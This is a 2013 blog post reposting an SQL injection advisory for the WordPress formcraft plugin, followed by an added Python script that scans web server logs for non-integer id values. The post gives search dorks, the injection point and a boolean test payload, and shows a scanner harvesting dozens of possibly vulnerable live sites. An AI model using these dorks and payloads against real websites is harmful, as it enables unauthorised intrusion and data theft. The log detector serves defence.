Sunday, December 15, 2013

WordPress formcraft Plugin SQL Injection plus SCANNER INURL

WordPress formcraft Plugin SQL Injection


#################################################################################
# Exploit Author : Ashiyane Digital Security Team
#
#DORK[0] inurl:/wp-content/plugins/formcraft
#DORK[1] inurl:/wp-content/plugins/formcraft/form.php?id=
#
# Tested on: Windows, Linux
#################################################################################
# Exploit type: SQL Injection
#
# Location: [target]/wp-content/plugins/formcraft/form.php?id=[Sql]
# Exploit-DB Note:
# Exploit injection: form.php?id=1%20and%20 1=1
# Exploit: http://www.exploit-db.com/exploits/30002/
#################################################################################

Using SCANNER INURL 1.0 - INTERFACE to capture URLs with this type of flaw.
Download: https://code.google.com/p/scanner-inurl/


CONFIGURATION
[Screenshot: WordPress formcraft Plugin SQL Injection SCANNER INURL]
RESULT
[Screenshot: WordPress formcraft Plugin SQL Injection SCANNER INURL result]

TOTAL DE URL's: 78

EXPLOIT USADO:

DORK: inurl:/wp-content/plugins/formcraft/form.php?id=

TIPO DE ERRO: PERSONALIZADO

PROCURAR ERRO:/plugins/formcraft/js/form.js?ver=

TOTAL DE POSSÍVEIS VULL: 47

ARQUIVO COM RESULTADO: resultados.txt
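
Site owners can look for requests against the injection point named in the advisory above in their own web server access logs. The following is an added example, not part of the original post or of SCANNER INURL: it flags requests to form.php whose id is not a plain integer. The combined log format, the sample lines and the assumption that legitimate form ids are integers are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, unquote

# Injection point named in the advisory: form.php?id=[Sql]
VULN_PATH = "/wp-content/plugins/formcraft/form.php"
# Assumed Apache/nginx combined log format: ip - - [time] "request line" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" (?P<status>\d{3})')

SAMPLE_LOG = [  # constructed lines using documentation IP ranges (RFC 5737)
    '192.0.2.10 - - [15/Dec/2013:10:00:01 +0000] "GET /wp-content/plugins/formcraft/form.php?id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Dec/2013:10:00:05 +0000] "GET /wp-content/plugins/formcraft/form.php?id=1%20and%20 1=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Dec/2013:10:00:06 +0000] "GET /blog/wp-content/plugins/formcraft/form.php?id=1%20and%201%3D1 HTTP/1.1" 200 5120',
    '203.0.113.4 - - [15/Dec/2013:10:00:09 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900',
]

def suspicious_id(line):
    """Return (client_ip, decoded id) for a form.php hit with a non-integer id, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group("request").split(" ", 1)  # method, then everything else
    if len(parts) != 2:
        return None
    # Cut the protocol from the right so a raw space inside the query survives.
    target = parts[1].rsplit(" HTTP/", 1)[0]
    url = urlsplit(target)
    # endswith() also matches WordPress installed in a subdirectory.
    if not unquote(url.path).lower().endswith(VULN_PATH):
        return None
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        # Assumption: a legitimate form id is ASCII digits only.
        if not (value.isascii() and value.isdigit()):
            return m.group("ip"), value
    return None

def report(lines):
    """Count flagged requests per client IP."""
    hits = Counter()
    for line in lines:
        found = suspicious_id(line)
        if found:
            hits[found[0]] += 1
    return hits

if __name__ == "__main__":
    for ip, count in report(SAMPLE_LOG).most_common():
        print(ip, count)
```

A hit only shows that someone sent a non-integer id; whether the installed plugin version is affected still has to be checked against the advisory.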
